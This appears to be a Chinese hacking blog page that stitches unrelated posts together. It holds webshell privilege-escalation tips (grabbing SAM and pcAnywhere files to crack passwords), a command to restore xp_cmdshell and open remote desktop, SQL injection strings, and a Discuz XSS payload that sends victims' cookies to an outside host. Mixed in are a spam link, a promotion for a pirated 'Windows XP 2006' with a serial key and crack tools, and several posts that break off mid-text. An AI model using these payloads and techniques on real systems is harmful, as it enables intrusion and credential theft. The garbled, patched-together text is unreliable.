超全的webshell权限提升方法

WEBSHELL权限提升技巧
c: d: e:.....
C:\Documents and Settings\All Users\「开始」菜单\程序\
看这里能不能跳转,我们从这里可以获取好多有用的信息比如Serv-U的路径,
C:\Documents and Settings\All Users\Application Data\Symantec\pcAnywhere\
看能否跳转到这个目录,如果行那就最好了,直接下它的CIF文件,破解得到pcAnywhere密码,登陆
c:\Program Files\serv-u\
C:\WINNT\system32\config\
下它的SAM,破解密码
c:\winnt\system32\inetsrv\data\
是erveryone 完全控制,很多时候没作限制,把提升权限的工具上传上去,然后执行

妓女小姐给微软高管上了一堂MBA课-继小猪之后

信息来源:www.369share.com

这才叫赚钱:月薪80000的小姐给我上了震撼一课

这个小姐做CSI恐怕也行。

SQL恢复XP_CMDSHLL,以及XPLOG70.DLL被删,直接用SQL连接器开启3389

(1)SQL Query Analyzer
sp_addextendedproc xp_cmdshell,@dllname='xplog70.dll'

(2)首先在SqlExec Sunx Version的Format选项里填上%s,在CMD选项里输入

勒索类病毒隐藏文件的常用方法(通常适用于肉鸡)

附1:勒索类病毒隐藏文件的常用方法
  
  1、在目录名后追加“.{21EC2020-3AEA-1069-A2DD-08002B30309D}”后缀,可以将目录伪装成“控制面板”。同理,追加“.{2227a280-3aea-1069-a2de-08002b30309d}”后缀可伪装成打印机目录等等。
  对策——将后缀删除即可恢复。
  

Windows XP 2006 简体中文版

继Windows XP发布以来,微软改变了两年左右升级一次系统的习惯,已经有数年没有推出新的操作系统,而仅是对已有的系统进行一些缝缝补补,它把全部精力和希望都集中在了Vista身上。                              

    经过微软不懈的宣传,我们已经知道计划中Vista是集成人性化的操作交互、3D图形界面、新的分区格式、全新的特性和硬件支持的集大成者,因而也成为众多的爱好者和媒体最为关注的软件。然而好事多磨,因为加入了太多的新功能与特性,Vista的开发一直波折重重,不断延期,发布日期从2004年一直拖到最近公布的2006年底。而微软、消费者和媒体也都在无尽的延期与等待中,消耗了大量的耐心。这也最终促使微软下决心去除一部分开发难度高的新特性,如WINFS格式支持,以尽快促使Longhorn的上市。在这次WINHEC2005大会上,微软发布了最新的Vista,这是目前最新的下一代操作系统。
   
    Windows的下一个版本——Longhorn(长角,按微软的意思应该不会早于2005年底发布,我们就叫她Windows 2006吧),目前仍处于走向市场的初级阶段,不过我们已经提前看到了该软件的一些特征。
  除了界面修改(包括增加了新的工具条),微软还更改了Windows Explorer这一控制桌面和电脑/文件浏览窗口的软件。
  在我们的预览码中,Windows Explorer通常显示的文件和计算机资源信息要比其在Windows XP中所显示的要多得多。Explorer面板上的新链接允许用户搜索关键字,评论和类别,文件内的数据,或者存储在其它设备、计算机或者网络上的对象。这是Longhhorn采用新的WinFS文件系统的第一证据,该文件系统可以让你即使不知道对象的物理位置或者对象类型也能找到相关资源。
  Explorer在显示文件和属性方面很有吸引力,这要归功于Longhorn采用的新的图形支系统(该系统的代码名称为Avalon)。该系统将它的许多工作传递给电脑的图形支系统。预览Longhorn的最低配置是800兆奔腾III处理器,256兆存储和一张32兆图形卡。这样的规格比Windows XP的要求要苛刻一些,不过等到Longhorn出货时支持该系统的硬件设备将变得很普通。
  
    修补XP安全漏洞
  
    Longhorn解决了Windows XP出现的一些长期没有解决的问题。互联网接入防火墙的默认设置是“打开”,并被升级到了双向模式,可以阻止外来的威胁和任何蠕虫和特洛伊木马病毒尝试发起的对外连接。同时,如同任何其它网络浏览器所做的一样,Internet Explorer包括了弹出式阻挡器,插件和下载管理器以及方便的可以清除所有cache、cookie、历史纪录和个人数据的行踪覆盖功能。但是Palladium安全技术――现在被称为下一代安全计算基础(NGSCB),在新的操作系统中尚没有看到。
  
    演讲(Speech),一个新的Windows XP控制面板程序,在Longhorn中包括了真正的附有练习文本的语音识别引擎。此外,新的用户帐户设置也允许每位用户的指定显示在登陆屏幕上。但是,Longhorn目前还没有捆绑任何日历软件。这或许是微软Longhorn与又一款即将推出的微软产品――下一版本的Office相互间紧密联系的证据。
  
    平板电脑操作系统得到免费升级,Longhorn也许要花费大约两年时间才能上市,但是平板电脑用户将不必为更新等待太长的时间。微软计划在2004年中期之前发布一款免费升级的Windows平板电脑2004版。
  
    该操作系统的代码名称为Lonestar。此次升级的焦点是改进手写输入。比如,当你将指示器放在一个可以获取文本的位置时,文本输入平台――产生手写识别窗口的地方,就会以小圆泡的形式自动出现,在激活之后,它会扩大成全尺寸并靠近文本区域而不是处在显示屏的底部。微软也赋予该系统TIP上下文识别功能,比如,如果你在填一个浏览器地址窗口,TIP就更有可能识别这样的URL。你也可以在向一个程序发送文本之前捕捉和修正TIP中的错误。
  
    新的开发工具将允许第三方软件开发者在他们的软件中融入该操作系统的一些新的功能。同时,随着本春季某个时候最终代码的出现,该升级的beta将在2004年早些时候到位Windows的下一个版本——Longhorn(长角,按微软的意思应该不会早于2005年底发布,我们就叫她Windows 2006吧),目前仍处于走向市场的初级阶段,不过我们已经提前看到了该软件的一些特征。

  除了界面修改(包括增加了新的工具条),微软还更改了Windows Explorer这一控制桌面和电脑/文件浏览窗口的软件。
  
    在我们的预览码中,Windows Explorer通常显示的文件和计算机资源信息要比其在Windows XP中所显示的要多得多。Explorer面板上的新链接允许用户搜索关键字,评论和类别,文件内的数据,或者存储在其它设备、计算机或者网络上的对象。这是Longhhorn采用新的WinFS文件系统的第一证据,该文件系统可以让你即使不知道对象的物理位置或者对象类型也能找到相关资源。

  Explorer在显示文件和属性方面很有吸引力,这要归功于Longhorn采用的新的图形支系统(该系统的代码名称为Avalon)。该系统将它的许多工作传递给电脑的图形支系统。预览Longhorn的最低配置是800兆奔腾III处理器,256兆存储和一张32兆图形卡。这样的规格比Windows XP的要求要苛刻一些,不过等到Longhorn出货时支持该系统的硬件设备将变得很普通。
  
    修补XP安全漏洞

  Longhorn解决了Windows XP出现的一些长期没有解决的问题。互联网接入防火墙的默认设置是“打开”,并被升级到了双向模式,可以阻止外来的威胁和任何蠕虫和特洛伊木马病毒。

    尝试发起的对外连接。同时,如同任何其它网络浏览器所做的一样,Internet Explorer包括了弹出式阻挡器,插件和下载管理器以及方便的可以清除所有cache、cookie、历史纪录和个人数据的行踪覆盖功能。但是Palladium安全技术――现在被称为下一代安全计算基础(NGSCB),在新的操作系统中尚没有看到。

    下载地址:

    http://download.microsoft.com/download/f/3/0/f30500f0-0eef-48fc-884b-3b0902885ff1/w2k3sp1_1433_usa_x64fre_pro.iso

    http://download.microsoft.com/do ... _usa_x64fre_pro.iso

    http://download.microsoft.com/download/f/3/0/f30500f0-0eef-48fc-884b-3b0902885ff1/w2k3sp1_1433_usa_x64fre_pro.iso


    BT下载: http://web2.59cn.cn/9aiwo/WinXP2006.torrent
   
    注意:一定要用Deamon Tools虚拟或者刻盘才能安装,否则根本无法安装,系统默认开启了DWM,界面美丽极了!!!实在令人兴奋!!!而且还有很多新功能,新特性,现在我非常兴奋,还等什么?马上下载吧!!!

    序列号:TCP8W-T8PQJ-WWRRH-QH76C-99FBW 


    拨号器下载: (不忘记告诉各位了装完后 要另外装拨号器,)

    http://www.52vista.com/Soft/5/25/2005/Soft_064.html

    系统限制真解工具(xp86/x64)

    http://www.52vista.com/Soft/4/9/2005/Soft_056.html

    基本上真解完了 基本上是一个完美的版本了.其他的各位就自己去打理一下咯~ 

    声明:本站没有做过测试,因此,不对上述资料的真实性负责,有兴趣的朋友下载后,请自行测试。

XSS测试语句大全

源码:  

Injection库总结

程序代码 程序代码

' or 1=1
' or '1=1
'/*
'%23

[ Discuz! v5.0.0 RC ] Xss

Message Script:

">><script>document.location.replace('http://www.zhaohuan.net/cookie.php?c='+document.cookie);</script>

Message post:

关闭硬盘Autorun功能防止黑客入侵

关闭硬盘AutoRun功能正是防范黑客人侵的有效方法之一。本文的目的就是为大家揭开硬盘AutoRun功能之谜及关闭该功能的方法。

在“开始”菜单的“运行”中输入Regedit, 打开注册表编辑器,展开到HKEY_CURRENT_USERSoftwareMicrosoft\Windows\CurrentVersion\Policies\Exploer主键下,在右侧窗格中找到“NoDriveTypeAutoRun”,就是这个键决定了是否执行CDROM或硬盘的AutoRun功能。

双击“NoDriveTypeAutoRun”,默认状态下(即你没有禁止过AutoRun功能),在弹出窗 口中可以看到“NoDriveTypeAutoRun”默认键值为95,00,00,00。其中第一个值“95”是16进制值,它是所有被禁止自动运行设备的和。将“95”转为二进制就是1001 01 01,其中每

记录远程登陆时间.bat

记录远程登陆时间.bat

@ echo off
data /t >>3389.txt
attrib +a +h d:/3389.bat
分页:[«]1[2][»]

日历

Powered By Z-Blog 1.8 Arwen Build 81206

湘 ICP 备 06003756 号
Copyright 山寨 Rights Reserved.